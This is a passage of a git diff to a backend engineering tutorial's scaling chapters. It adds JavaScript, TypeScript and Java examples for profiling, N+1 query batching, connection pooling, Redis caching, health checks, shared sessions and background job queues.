+// the single most confusing production symptom in Node.
+import { monitorEventLoopDelay } from 'node:perf_hooks'
+
+const histogram = monitorEventLoopDelay({ resolution: 10 })
+histogram.enable()
+
+setInterval(() => {
+  // If p99 climbs above a few milliseconds, something synchronous is
+  // hogging the loop: JSON.parse on a huge body, a sync crypto call,
+  // a regex backtracking. Profile THAT, not the handler that looks slow.
+  console.log(`event loop p99: ${(histogram.percentile(99) / 1e6).toFixed(1)}ms`)
+}, 10_000)
+
+// Run with --cpu-prof to find the offender:
+//   node --cpu-prof --cpu-prof-dir=./profiles dist/app.js
+```
+
+```java
+// The JVM ships a production-grade profiler: Java Flight Recorder. It is
+// designed to run continuously with ~1% overhead, so unlike most
+// profilers you can leave it on in production.
+//
+//   java -XX:StartFlightRecording=duration=30s,filename=profile.jfr -jar app.jar
+//
+// Or attach to a running process by pid:
+//   jcmd <pid> JFR.start duration=30s filename=profile.jfr
+//   jcmd <pid> JFR.dump  filename=profile.jfr
+//
+// Open profile.jfr in JDK Mission Control (free) for flame graphs, GC
+// pauses, lock contention and allocation hot spots in one view.
+
+// async-profiler is the other standard choice, and it produces a flame
+// graph directly:
+//   ./profiler.sh -d 30 -f flame.html <pid>
+//
+// It also samples ALLOCATION and LOCK events, not just CPU:
+//   ./profiler.sh -e alloc -d 30 -f alloc.html <pid>
+//   ./profiler.sh -e lock  -d 30 -f lock.html  <pid>
+//
+// That matters because on the JVM the bottleneck is often GC pressure or
+// a contended synchronized block, and a pure CPU profile shows neither.
 ```
 
 ### CPU-bound vs I/O-bound bottlenecks
@@ -351,10 +574,11 @@ Imagine a blog application. To render the homepage, you need 20 blog posts with 
 
 Instead of querying in a loop, collect all the IDs you need and fetch them in a single query using `WHERE id IN (...)`. The result: always 2 queries regardless of the number of items, one for the list, one for the related data.
 
-#### Go: solving N+1 with a batch query
+Go Python JavaScript TypeScript Java
+
+two queries, always, no matter how many rows come back
 
 ```go
-Go
 func GetPostsWithAuthors(ctx context.Context, db *sql.DB) ([]PostWithAuthor, error) {
     // Query 1: fetch all posts
     posts, err := queryPosts(ctx, db)
@@ -392,10 +616,7 @@ func GetPostsWithAuthors(ctx context.Context, db *sql.DB) ([]PostWithAuthor, err
 }
 ```
 
-#### Python (Django): select\_related & prefetch\_related
-
-```text
-Python
+```python
 # BAD, N+1 queries (Django ORM)
 posts = Post.objects.all()
 for post in posts:
@@ -408,10 +629,102 @@ posts = Post.objects.select_related("author").all()
 posts = Post.objects.prefetch_related("tags").all()
 ```
 
+```js
+async function getPostsWithAuthors(db) {
+  // Query 1: fetch all posts
+  const { rows: posts } = await db.query('SELECT * FROM posts')
+
+  // Collect unique author IDs
+  const authorIds = [...new Set(posts.map((p) => p.author_id))]
+
+  // Query 2: fetch ALL authors in one batch.
+  // = ANY($1) rather than IN (...): one bound array parameter, so the
+  // query text is identical whether there are 3 authors or 300, which
+  // also means Postgres can reuse the prepared plan.
+  const { rows: authors } = await db.query(
+    'SELECT * FROM users WHERE id = ANY($1)', [authorIds])
+
+  // Build lookup map and merge
+  const authorMap = new Map(authors.map((a) => [a.id, a]))
+
+  return posts.map((post) => ({ post, author: authorMap.get(post.author_id) }))
+}
+
+// The other Node answer is DataLoader, which batches per event-loop tick.
+// It lets each resolver ask for ONE author and still issues one query for
+// all of them, which is why every GraphQL server uses it.
+```
+
+```ts
+import DataLoader from 'dataloader'
+import type { Pool } from 'pg'
+
+// DataLoader is worth showing in the typed tab because its generics are
+// what make it safe: <K, V> pins the key type and the value type, so a
+// loader keyed by author id cannot be handed a post id by mistake.
+function createAuthorLoader(db: Pool): DataLoader<number, Author> {
+  return new DataLoader<number, Author>(async (ids) => {
+    // Called ONCE per event-loop tick with every id requested in it,
+    // however many separate call sites asked. That is the N+1 fix,
+    // applied automatically rather than by restructuring the callers.
+    const { rows } = await db.query<Author>(
+      'SELECT * FROM users WHERE id = ANY($1)', [[...ids]])
+
+    const byId = new Map(rows.map((a) => [a.id, a]))
+
+    // The contract: return results in the SAME ORDER as `ids`, with a
+    // hole for anything missing. Getting this wrong silently hands the
+    // wrong author to the wrong post, and nothing throws.
+    return ids.map((id) => byId.get(id) ?? new Error(`no author ${id}`))
+  })
+}
+
+async function getPostsWithAuthors(db: Pool): Promise<PostWithAuthor[]> {
+  const authors = createAuthorLoader(db) // one loader PER REQUEST, never global
+  const { rows: posts } = await db.query<Post>('SELECT * FROM posts')
+
+  // Looks like N+1 and is not: all of these batch into one query.
+  return Promise.all(
+    posts.map(async (post) => ({ post, author: await authors.load(post.author_id) })),
+  )
+}
+```
+
+```java
+// JPA/Hibernate is where N+1 bites hardest, because the lazy loading
+// that causes it is invisible: `post.getAuthor().getName()` looks like a
+// field access and is a SELECT.
+
+// BAD, N+1 queries
+List<Post> posts = em.createQuery("SELECT p FROM Post p", Post.class).getResultList();
+for (Post post : posts) {
+    System.out.println(post.getAuthor().getName()); // one query EACH
+}
+
+// GOOD, 1 query with a JOIN FETCH
+List<Post> posts = em.createQuery("""
+        SELECT p FROM Post p JOIN FETCH p.author
+        """, Post.class).getResultList();
+
+// GOOD, Spring Data: the same fetch, declared on the repository
+public interface PostRepository extends JpaRepository<Post, Long> {
+    @EntityGraph(attributePaths = "author")
+    List<Post> findAll();
+}
+
+// Or batch it, which is the closest analogue to the Go tab: Hibernate
+// collects the lazy proxies and loads them IN (...) batches of 50.
+//   spring.jpa.properties.hibernate.default_batch_fetch_size: 50
+
+// Turn the SQL log on in development and count the lines. It is the only
+// reliable way to catch this before production does:
+//   spring.jpa.show-sql: true
+```
+
 Every modern ORM provides bulk-fetch primitives: Django has `select_related` / `prefetch_related`, Ruby on Rails has `includes`, Prisma and Drizzle offer `leftJoin` and relation loading. If you're writing raw SQL, the answer is `JOIN`. The pattern to avoid is any loop that fires a query per iteration.
 
 <Callout type="info" title="Pro tip">
-Most modern ORMs have a "print generated SQL" mode. Enable it during development to catch N+1 patterns before they reach production. In Django: `settings.LOGGING` with the `django.db.backends` logger. In Go's GORM: `db.Debug()`.
+Most modern ORMs have a "print generated SQL" mode. Enable it during development to catch N+1 patterns before they reach production. In Django: `settings.LOGGING` with the `django.db.backends` logger. In Go's GORM: `db.Debug()`. In Prisma: `new PrismaClient({ log: ['query'] })`. In Hibernate: `spring.jpa.show-sql: true`.
 </Callout>
 
 ## Indexes & Query Plans
@@ -430,8 +743,7 @@ Sequential scan: O(n) -> Index scan: O(log n)
 
 ### Creating indexes
 
-```text
-SQL
+```sql
 -- Basic single-column index
 CREATE INDEX idx_posts_author_id ON posts (author_id);
 
@@ -469,8 +781,7 @@ Indexes are not free. Each index consumes disk space (and ideally fits in memory
 
 To discover whether your queries use indexes, Postgres provides the `EXPLAIN ANALYZE` command. It runs the query and shows the exact execution plan, which tables were scanned, which indexes were used, and how long each step took.
 
-```dockerfile
-SQL
+```sql
 EXPLAIN ANALYZE
 SELECT p.*, u.name AS author_name
 FROM posts p
@@ -519,10 +830,11 @@ A connection pool maintains a set of pre-established, reusable connections. Inst
 - Total connections to DB are centrally controlled
 - Preferred for **horizontally scaled** production systems
 
-#### Connection pooling in Go
+Go Python JavaScript TypeScript Java
+
+cap the pool, recycle connections, and count the instances
 
 ```go
-Go
 import "database/sql"
 
 db, err := sql.Open("postgres", connStr)
@@ -537,10 +849,7 @@ db.SetConnMaxLifetime(5 * time.Minute)  // recycle connections after 5 min
 db.SetConnMaxIdleTime(1 * time.Minute)  // close idle connections after 1 min
 ```
 
-#### Connection pooling in Python (SQLAlchemy)
-
-```text
-Python
+```python
 from sqlalchemy import create_engine
 
 engine = create_engine(
@@ -551,6 +860,85 @@ engine = create_engine(
     pool_recycle=1800,     # recycle connections every 30 minutes
     pool_pre_ping=True,    # test connection health before use
 )
+```
+
+```js
+import { Pool } from 'pg'
+
+const pool = new Pool({
+  connectionString: process.env.DATABASE_URL,
+  max: 20,                      // max open connections to the DB
+  idleTimeoutMillis: 60_000,    // close idle connections after 1 min
+  connectionTimeoutMillis: 30_000, // wait up to 30s for a free connection
+  maxLifetimeSeconds: 300,      // recycle connections after 5 min
+})
+
+// Never let a pool error take the process down. A connection dropped by
+// the database (a failover, an idle timeout on the server side) emits
+// 'error' on the IDLE client, and an unhandled 'error' event in Node is
+// an immediate crash.
+pool.on('error', (err) => {
+  console.error('idle client error', err)
+})
+```
+
+```ts
+import { Pool, type PoolConfig } from 'pg'
+
+// The arithmetic is the part worth writing down, because it is what
+// actually breaks: max x replicas must stay under the server's limit.
+// Postgres defaults to 100 connections TOTAL, and a few are reserved for
+// superuser, so 5 replicas x 20 is already the whole budget.
+const MAX_PER_INSTANCE = 20
+const REPLICAS = 5
+// 20 x 5 = 100 -> at the limit. Lower `max`, or put PgBouncer in front.
+
+const config: PoolConfig = {
+  connectionString: process.env.DATABASE_URL,
+  max: MAX_PER_INSTANCE,
+  idleTimeoutMillis: 60_000,
+  connectionTimeoutMillis: 30_000,
+}
+
+export const pool = new Pool(config)
+
+pool.on('error', (err: Error) => console.error('idle client error', err))
+
+// A bigger pool is not a faster app. Past the point where the database
+// can run queries in parallel, extra connections only move the queue
+// from your app into the database, where it is harder to see.
+```
+
+```java
+// Spring Boot uses HikariCP by default, and it is configured entirely in
+// application.yml, no code.
+//
+//   spring.datasource.hikari:
+//     maximum-pool-size: 20      # max open connections to the DB
+//     minimum-idle: 10           # idle connections kept ready
+//     max-lifetime: 300000       # recycle connections after 5 min (ms)
+//     idle-timeout: 60000        # close idle connections after 1 min
+//     connection-timeout: 30000  # fail fast rather than hang forever
+
+// HikariCP's own guidance is deliberately counter-intuitive and worth
+// taking seriously: the optimal pool size is SMALL. Their formula is
+// roughly (core_count * 2) + effective_spindle_count, which for an
+// 8-core database box is about 17, not 200. A larger pool adds context
+// switching and lock contention inside the database and makes
+// throughput WORSE, while making the problem invisible to your metrics.
+
+@Bean
+DataSource dataSource() {
+    HikariConfig config = new HikariConfig();
+    config.setJdbcUrl(System.getenv("DATABASE_URL"));
+    config.setMaximumPoolSize(20);
+    config.setMaxLifetime(Duration.ofMinutes(5).toMillis());
+    // Fail fast when the pool is exhausted. The default is 30s, and a
+    // request that waits 30s for a connection has already timed out
+    // upstream, so all it does is hold a thread hostage.
+    config.setConnectionTimeout(Duration.ofSeconds(5).toMillis());
+    return new HikariDataSource(config);
+}
 ```
 
 <Callout type="info">
@@ -583,10 +971,11 @@ In practice, you place a cache (typically Redis, Memcached, or Valkey) in front 
 
 Many production systems use both: a small local cache for the "hottest" data (most frequently accessed items) backed by a larger distributed cache. A request checks the local cache first (sub-millisecond), then falls back to the distributed cache (a few milliseconds), and only hits the database on a full miss.
 
-#### Simple Redis caching in Go
+Go Python JavaScript TypeScript Java
+
+check the cache, fall back to the database, write back with a TTL
 
 ```go
-Go
 import (
     "context"
     "encoding/json"
@@ -621,10 +1010,7 @@ func GetProduct(ctx context.Context, id string) (*Product, error) {
 }
 ```
 
-#### Simple Redis caching in Python
-
 ```python
-Python
 import json, redis
 
 r = redis.Redis(host="localhost", port=6379, decode_responses=True)
@@ -643,6 +1029,103 @@ def get_product(product_id: str) -> dict:
     # 3. Store with 10-minute TTL
     r.setex(cache_key, 600, json.dumps(product))
     return product
+```
+
+```js
+import { createClient } from 'redis'
+
+const redis = createClient({ url: 'redis://localhost:6379' })
+await redis.connect()
+
+export async function getProduct(id) {
+  const cacheKey = `product:${id}`
+
+  // 1. Try cache first
+  const cached = await redis.get(cacheKey)
+  if (cached !== null) {
+    return JSON.parse(cached) // Cache HIT, ~2ms
+  }
+
+  // 2. Cache miss, query database
+  const product = await queryProductFromDb(id)
+
+  // 3. Store in cache with TTL
+  await redis.set(cacheKey, JSON.stringify(product), { EX: 600 }) // 10 min
+
+  return product
+}
+```
+
+```ts
+import type { RedisClientType } from 'redis'
+
+const TTL_SECONDS = 600 // 10 minutes
+
+// One generic helper instead of this block copied per entity. The type
+// parameter is what makes it reusable: the caller decides what shape
+// comes back, and the cache layer never has to know.
+async function cached<T>(
+  redis: RedisClientType,
+  key: string,
+  load: () => Promise<T>,
+  ttl = TTL_SECONDS,
+): Promise<T> {
+  // 1. Try cache first
+  const hit = await redis.get(key)
+  if (hit !== null) {
+    return JSON.parse(hit) as T // Cache HIT, ~2ms
+  }
+
+  // 2. Cache miss, query database
+  const value = await load()
+
+  // 3. Store in cache with TTL
+  await redis.set(key, JSON.stringify(value), { EX: ttl })
+
+  return value
+}
+
+export const getProduct = (id: string): Promise<Product> =>
+  cached(redis, `product:${id}`, () => queryProductFromDb(id))
+
+// One caveat this shape does NOT solve, and it is the one that bites in
+// production: if a popular key expires, every in-flight request misses
+// at once and they all hit the database together. That is a cache
+// stampede, and the fix is a short lock or a single-flight wrapper so
+// only the first miss does the work. See chapter 09.
+```
+
+```java
+@Service
+public class ProductService {
+    private static final Duration TTL = Duration.ofMinutes(10);
+
+    private final StringRedisTemplate redis;
+    private final ObjectMapper json;
+
+    public Product getProduct(String id) throws JsonProcessingException {
+        String cacheKey = "product:" + id;
+
+        // 1. Try cache first
+        String cached = redis.opsForValue().get(cacheKey);
+        if (cached != null) {
+            return json.readValue(cached, Product.class); // Cache HIT, ~2ms
+        }
+
+        // 2. Cache miss, query database
+        Product product = queryProductFromDb(id);
+
+        // 3. Store in cache with TTL
+        redis.opsForValue().set(cacheKey, json.writeValueAsString(product), TTL);
+
+        return product;
+    }
+}
+
+// Or declaratively, which is the version you would actually ship:
+//   @Cacheable(cacheNames = "product", key = "#id")
+//   public Product getProduct(String id) { return queryProductFromDb(id); }
+// with the TTL set on the RedisCacheManager. See chapter 09.
 ```
 
 ## Cache Invalidation
@@ -764,8 +1247,7 @@ The moment you have more than one server, you need a mechanism to distribute inc
 
 ### Load balancer in practice (Nginx config)
 
-```text
-Nginx
+```nginx
 upstream backend {
     # Least connections algorithm
     least_conn;
@@ -792,10 +1274,11 @@ server {
 
 Load balancers periodically send health check probes (HTTP requests to a `/health` endpoint) to each backend. If a server fails to respond, the load balancer stops routing traffic to it. When the server recovers, traffic resumes. This is the mechanism that provides the redundancy benefit of horizontal scaling.
 
-#### Simple health endpoint in Go
+Go Python JavaScript TypeScript Java
+
+probe the dependency, answer 503 when it is unreachable
 
 ```go
-Go
 http.HandleFunc("/health", func(w http.ResponseWriter, r *http.Request) {
     // Check database connectivity
     if err := db.PingContext(r.Context()); err != nil {
@@ -811,6 +1294,89 @@ http.HandleFunc("/health", func(w http.ResponseWriter, r *http.Request) {
         "status": "healthy",
     })
 })
+```
+
+```python
+@app.get("/health")
+async def health(response: Response):
+    # Check database connectivity
+    try:
+        await db.execute(text("SELECT 1"))
+    except Exception:
+        response.status_code = 503
+        return {"status": "unhealthy", "reason": "database unreachable"}
+
+    return {"status": "healthy"}
+```
+
+```js
+app.get('/health', async (req, res) => {
+  // Check database connectivity
+  try {
+    await pool.query('SELECT 1')
+  } catch {
+    return res.status(503).json({
+      status: 'unhealthy',
+      reason: 'database unreachable',
+    })
+  }
+
+  res.status(200).json({ status: 'healthy' })
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+// Keep the health check CHEAP and give it a timeout. A probe that runs a
+// real query, or that can hang, turns a slow database into a fleet-wide
+// outage: every instance fails its check at once and the load balancer
+// takes all of them out of rotation simultaneously.
+export async function health(_req: Request, res: Response): Promise<void> {
+  try {
+    await Promise.race([
+      pool.query('SELECT 1'),
+      new Promise((_, reject) => setTimeout(() => reject(new Error('timeout')), 2000)),
+    ])
+  } catch {
+    res.status(503).json({ status: 'unhealthy', reason: 'database unreachable' })
+    return
+  }
+
+  res.status(200).json({ status: 'healthy' })
+}
+```
+
+```java
+// Spring Boot Actuator gives you this endpoint for free, and it already
+// includes a DataSource check:
+//   management.endpoint.health.show-details: always
+//
+// GET /actuator/health -> 200 {"status":"UP"} or 503 {"status":"DOWN"}
+
+// Anything it does not know about is one bean:
+@Component
+public class DatabaseHealthIndicator implements HealthIndicator {
+    private final JdbcClient db;
+
+    DatabaseHealthIndicator(JdbcClient db) {
+        this.db = db;
+    }
+
+    @Override
+    public Health health() {
+        try {
+            db.sql("SELECT 1").query(Integer.class).single();
+            return Health.up().build();
+        } catch (Exception e) {
+            return Health.down().withDetail("reason", "database unreachable").build();
+        }
+    }
+}
+
+// See chapter 12 for why liveness and readiness must be separate groups:
+// a database outage should stop traffic being routed here, but must NOT
+// restart the pod, since restarting does not bring the database back.
 ```
 
 ## Summary & Key Principles
@@ -835,4 +1401,4 @@ Performance engineering is not about memorizing a checklist of techniques. It's 
 
 [^ Back to top](#top)
 
-Backend from First Principles / Chapter 18 / Scaling. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 18 / Scaling. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/19-scaling-and-performance-part-2.mdx
+++ b/src/content/chapters/19-scaling-and-performance-part-2.mdx
@@ -2,7 +2,7 @@
 order: 19
 title: "Infrastructure, Architecture & Beyond"
 navTitle: "Scaling & Performance (Part 2)"
-summary: "Chapter 19 of Backend from First Principles: Scaling & Performance (Part 2)."
+summary: "Scaling past one machine: statelessness as the thing that makes instances interchangeable, load balancer algorithms and health checks, read replicas and sharding, CDNs and the edge, offloading work to queues, and the honest trade-offs of microservices and serverless. Worked implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "scaling"
@@ -37,10 +37,11 @@ Statelessness is the principle that no single server instance holds any informat
 | **Database**        | SQLite file on disk         | Postgres (RDS), MySQL, centralized SQLite |
 | **Background jobs** | In-process goroutine/thread | Redis queue, RabbitMQ, Kafka              |
 
-#### Stateless session management in Go
+Go Python JavaScript TypeScript Java
+
+the session lives in Redis, so any instance can serve any request
 
 ```go
-Go
 import (
     "context"
     "github.com/redis/go-redis/v9"
@@ -61,10 +62,7 @@ func GetSession(ctx context.Context, sessionID string) (string, error) {
 }
 ```
 
-#### Stateless session in Python (FastAPI + Redis)
-
 ```python
-Python
 import redis, uuid
 from fastapi import FastAPI, Response, Cookie
 
@@ -80,6 +78,91 @@ def login(response: Response, email: str, password: str):
     r.setex(f"session:{session_id}", 86400, user.id)
     response.set_cookie("session_id", session_id, httponly=True)
     return {"status": "ok"}
+```
+
+```js
+import { randomUUID } from 'node:crypto'
+
+const SESSION_TTL = 60 * 60 * 24 // 24 hours
+
+app.post('/login', async (req, res) => {
+  const user = await authenticate(req.body.email, req.body.password)
+  const sessionId = randomUUID()
+
+  // Store in Redis, accessible by ALL server instances
+  await redis.set(`session:${sessionId}`, user.id, { EX: SESSION_TTL })
+
+  res.cookie('session_id', sessionId, { httpOnly: true, secure: true, sameSite: 'lax' })
+  res.json({ status: 'ok' })
+})
+
+// The Express default that breaks this: express-session with no store
+// keeps sessions in a MemoryStore, in the process. It works perfectly on
+// one instance and logs users out at random the moment you run two.
+```
+
+```ts
+import session from 'express-session'
+import { RedisStore } from 'connect-redis'
+
+// Typing the session payload once is what stops it drifting into an
+// untyped bag that each handler guesses at. Declaration merging widens
+// the library's own type, so `req.session.userId` is checked everywhere.
+declare module 'express-session' {
+  interface SessionData {
+    userId: string
+    role: 'admin' | 'user'
+  }
+}
+
+app.use(session({
+  // The store is the ONLY line that matters for horizontal scaling:
+  // omit it and express-session silently uses an in-process MemoryStore,
+  // which is exactly the state that makes instances non-interchangeable.
+  store: new RedisStore({ client: redis, prefix: 'session:' }),
+  secret: process.env.SESSION_SECRET!,
+  resave: false,
+  saveUninitialized: false,
+  cookie: { httpOnly: true, secure: true, maxAge: 86_400_000 },
+}))
+
+app.post('/login', async (req, res) => {
+  const user = await authenticate(req.body.email, req.body.password)
+  req.session.userId = user.id // written straight through to Redis
+  res.json({ status: 'ok' })
+})
+```
+
+```java
+// Spring Session turns this into one dependency plus one annotation. The
+// ordinary servlet HttpSession is then backed by Redis, so every
+// getAttribute / setAttribute already in your codebase becomes shared
+// across instances with no code change at all.
+//
+//   implementation 'org.springframework.session:spring-session-data-redis'
+
+@Configuration
+@EnableRedisHttpSession(maxInactiveIntervalInSeconds = 86400) // 24h
+public class SessionConfig { }
+
+@RestController
+class AuthController {
+
+    @PostMapping("/login")
+    Map<String, String> login(@RequestBody LoginRequest body, HttpSession session) {
+        User user = authenticate(body.email(), body.password());
+
+        // Stored in Redis, accessible by ALL server instances
+        session.setAttribute("userId", user.id());
+
+        return Map.of("status", "ok");
+    }
+}
+
+// The default without Spring Session is Tomcat's in-memory session map,
+// which is per-JVM. That is what forces people into sticky sessions at
+// the load balancer, and sticky sessions mean losing every user on that
+// instance when it restarts. Externalise the session instead.
 ```
 
 <Callout type="info" title="Thumb rule">
@@ -118,10 +201,11 @@ What happens when a server crashes? Without health checks, a round-robin load ba
 <svg viewBox="0 0 600 180" xmlns="http://www.w3.org/2000/svg" style="max-width:600px;width:100%"><defs><marker id="ah" markerWidth="7" markerHeight="5" refX="7" refY="2.5" orient="auto"><path d="M0,0 L7,2.5 L0,5" fill="var(--dg-ok)"></path></marker><marker id="af" markerWidth="7" markerHeight="5" refX="7" refY="2.5" orient="auto"><path d="M0,0 L7,2.5 L0,5" fill="var(--dg-accent)"></path></marker></defs><rect x="20" y="55" width="100" height="65" rx="5" fill="var(--dg-surface)" stroke="var(--dg-ink-2)" stroke-width="1.3"></rect><text x="70" y="85" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="9" fill="var(--dg-ink-2)">LB</text><text x="70" y="100" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">health check</text><text x="70" y="112" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">every 1s</text><rect x="200" y="15" width="120" height="40" rx="4" fill="var(--dg-surface)" stroke="var(--dg-ok)" stroke-width="1.3"></rect><text x="260" y="39" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="9" fill="var(--dg-ok-soft)">Server A </text><line x1="120" y1="72" x2="200" y2="35" stroke="var(--dg-ok)" stroke-width="1" stroke-dasharray="4 3" marker-end="url(#ah)"></line><text x="170" y="44" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ok)">200</text><rect x="200" y="70" width="120" height="40" rx="4" fill="var(--dg-accent-tint)" stroke="var(--dg-accent)" stroke-width="1.5" stroke-dasharray="4 3"></rect><text x="260" y="94" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="9" fill="var(--dg-accent)">Server B</text><line x1="120" y1="88" x2="200" y2="90" stroke="var(--dg-accent)" stroke-width="1" stroke-dasharray="4 3" marker-end="url(#af)"></line><text x="170" y="82" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-accent)">502</text><text x="340" y="82" font-family="var(--font-ui)" font-size="8" fill="var(--dg-accent)" font-weight="600">-> BLACKLISTED</text><text x="340" y="95" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">no user traffic sent</text><rect x="200" y="125" width="120" height="40" rx="4" fill="var(--dg-surface)" stroke="var(--dg-ok)" stroke-width="1.3"></rect><text x="260" y="149" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="9" fill="var(--dg-ok-soft)">Server C </text><line x1="120" y1="105" x2="200" y2="145" stroke="var(--dg-ok)" stroke-width="1" stroke-dasharray="4 3" marker-end="url(#ah)"></line><text x="170" y="135" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ok)">200</text></svg>
 </Diagram>
 
-#### Health endpoint in Go
+Go Python JavaScript TypeScript Java
+
+check every downstream dependency, not just "I am alive"
 
 ```go
-Go
 // A production health check verifies downstream dependencies, not just "I'm alive."
 http.HandleFunc("/health", func(w http.ResponseWriter, r *http.Request) {
     checks := map[string]string{}
@@ -147,6 +231,119 @@ http.HandleFunc("/health", func(w http.ResponseWriter, r *http.Request) {
     }
     json.NewEncoder(w).Encode(checks)
 })
+```
+
+```python
+# A production health check verifies downstream dependencies,
+# not just "I'm alive."
+@app.get("/health")
+async def health(response: Response):
+    checks = {}
+
+    try:
+        await db.execute(text("SELECT 1"))
+        checks["database"] = "ok"
+    except Exception:
+        checks["database"] = "unreachable"
+
+    try:
+        await redis.ping()
+        checks["redis"] = "ok"
+    except Exception:
+        checks["redis"] = "unreachable"
+
+    if any(v != "ok" for v in checks.values()):
+        response.status_code = 503
+
+    return checks
+```
+
+```js
+// A production health check verifies downstream dependencies,
+// not just "I'm alive."
+app.get('/health', async (req, res) => {
+  const checks = {}
+
+  // Run the probes CONCURRENTLY. Done in sequence, a health check with
+  // four dependencies that each take a second is a four-second probe,
+  // and the load balancer's timeout is usually shorter than that.
+  const [db, cache] = await Promise.allSettled([
+    pool.query('SELECT 1'),
+    redis.ping(),
+  ])
+
+  checks.database = db.status === 'fulfilled' ? 'ok' : 'unreachable'
+  checks.redis = cache.status === 'fulfilled' ? 'ok' : 'unreachable'
+
+  const healthy = Object.values(checks).every((v) => v === 'ok')
+  res.status(healthy ? 200 : 503).json(checks)
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+type CheckResult = 'ok' | 'unreachable'
+
+// Declaring the dependencies as data rather than as another pair of
+// try/catch blocks is what keeps this endpoint correct as the service
+// grows: adding a fifth dependency is one line, and it automatically
+// inherits the concurrency and the timeout.
+const DEPENDENCIES: Array<{ name: string; probe: () => Promise<unknown> }> = [
+  { name: 'database', probe: () => pool.query('SELECT 1') },
+  { name: 'redis', probe: () => redis.ping() },
+]
+
+export async function health(_req: Request, res: Response): Promise<void> {
+  const results = await Promise.all(
+    DEPENDENCIES.map(async ({ name, probe }): Promise<[string, CheckResult]> => {
+      try {
+        await Promise.race([
+          probe(),
+          new Promise((_, rej) => setTimeout(() => rej(new Error('timeout')), 2000)),
+        ])
+        return [name, 'ok']
+      } catch {
+        return [name, 'unreachable']
+      }
+    }),
+  )
+
+  const checks = Object.fromEntries(results)
+  const healthy = results.every(([, v]) => v === 'ok')
+
+  res.status(healthy ? 200 : 503).json(checks)
+}
+```
+
+```java
+// Spring Boot Actuator aggregates every HealthIndicator on the classpath
+// and already ships ones for DataSource and Redis, so this endpoint
+// exists without code:
+//   management.endpoint.health.show-details: always
+//
+// GET /actuator/health
+//   200 {"status":"UP","components":{"db":{"status":"UP"},"redis":{...}}}
+//   503 {"status":"DOWN",...}   as soon as any component is DOWN
+
+// Add your own for anything Actuator cannot know about:
+@Component
+public class PaymentProviderHealthIndicator implements HealthIndicator {
+    private final RestClient client;
+
+    @Override
+    public Health health() {
+        try {
+            client.get().uri("/ping").retrieve().toBodilessEntity();
+            return Health.up().build();
+        } catch (Exception e) {
+            // Consider whether a third party being down should really
+            // take YOUR instance out of rotation. Often it should not:
+            // report it as a detail, and keep the aggregate UP.
+            return Health.down().withDetail("provider", "unreachable").build();
+        }
+    }
+}
 ```
 
 ## Read Replicas
@@ -259,10 +456,11 @@ Async: 100ms (DB) + push to queue = 100ms perceived
 
 **Emails & notifications**: users don't expect instant delivery. **Image/video processing**: encoding, resizing, thumbnail generation. **Account deletion**: cascading deletes across many tables. **Report generation**: aggregating data across millions of rows. **Webhook delivery**: retrying on failure without blocking the main request. The rule: if the user doesn't need the result in the same HTTP response, it's a candidate for async processing.
 
-#### Background job with Go and Redis
+Go Python JavaScript TypeScript Java
+
+the API pushes, a separate worker process pops
 
 ```go
-Go
 import (
     "context"
     "encoding/json"
@@ -294,10 +492,7 @@ func EmailWorker(ctx context.Context) {
 }
 ```
 
-#### Background job with Python (Celery)
-
 ```python
-Python
 from celery import Celery
 
 app = Celery("tasks", broker="redis://localhost:6379/0")
@@ -318,8 +513,98 @@ def send_invitation_email(self, email: str, invite_url: str):
 send_invitation_email.delay("user@example.com", "https://app.co/invite/abc")
 ```
 
+```js
+import { Queue, Worker } from 'bullmq'
+
+const connection = { host: 'localhost', port: 6379 }
+
+// Producer: push job to queue (called from your API handler)
+const emailQueue = new Queue('emails', { connection })
+
+export async function enqueueEmail(job) {
+  await emailQueue.add('send', job, {
+    attempts: 3,
+    backoff: { type: 'exponential', delay: 60_000 },
+  })
+}
+
+// Consumer: runs as a SEPARATE process, never imported by the API
+new Worker('emails', async (job) => {
+  await sendEmail(job.data) // takes 300ms, but no user is waiting
+}, { connection, concurrency: 10 })
+
+// In your API handler, returns instantly to the user
+await enqueueEmail({ to: 'user@example.com', subject: "You've been invited!" })
+```
+
+```ts
+import { Queue, Worker, type Job } from 'bullmq'
+
+// The job payload type, imported by BOTH the producer and the worker.
+// This is the cheapest possible fix for the most common queue bug: a
+// producer that starts sending a renamed field while the worker still
+// reads the old one, which fails silently, in a different process,
+// minutes later. Here it is a compile error.
+export interface EmailJob {
+  to: string
+  subject: string
+  template: string
+}
+
+const emailQueue = new Queue<EmailJob>('emails', { connection })
+
+// Producer: push job to queue (called from your API handler)
+export async function enqueueEmail(job: EmailJob): Promise<void> {
+  await emailQueue.add('send', job, {
+    attempts: 3,
+    backoff: { type: 'exponential', delay: 60_000 },
+  })
+}
+
+// Consumer: a separate process
+new Worker<EmailJob>('emails', async (job: Job<EmailJob>) => {
+  await sendEmail(job.data) // takes 300ms, but no user is waiting
+}, { connection, concurrency: 10 })
+```
+
+```java
+// Producer: the simplest version in Spring is @Async, which hands the
+// method to a thread pool and returns to the caller immediately.
+@Service
+public class EmailService {
+
+    @Async
+    public void sendInvitationEmail(String email, String inviteUrl) {
+        emailProvider.send(email, "You've been invited!", "invite",
+            Map.of("url", inviteUrl)); // 300ms, but no user is waiting
+    }
+}
+
+@Configuration
+@EnableAsync
+class AsyncConfig {
+    @Bean
+    Executor taskExecutor() {
+        var executor = new ThreadPoolTaskExecutor();
+        executor.setCorePoolSize(10);
+        executor.setQueueCapacity(100);
+        // What to do when the queue is full. The default silently
+        // REJECTS the task; CallerRunsPolicy instead runs it on the
+        // calling thread, which slows the API down but never loses work.
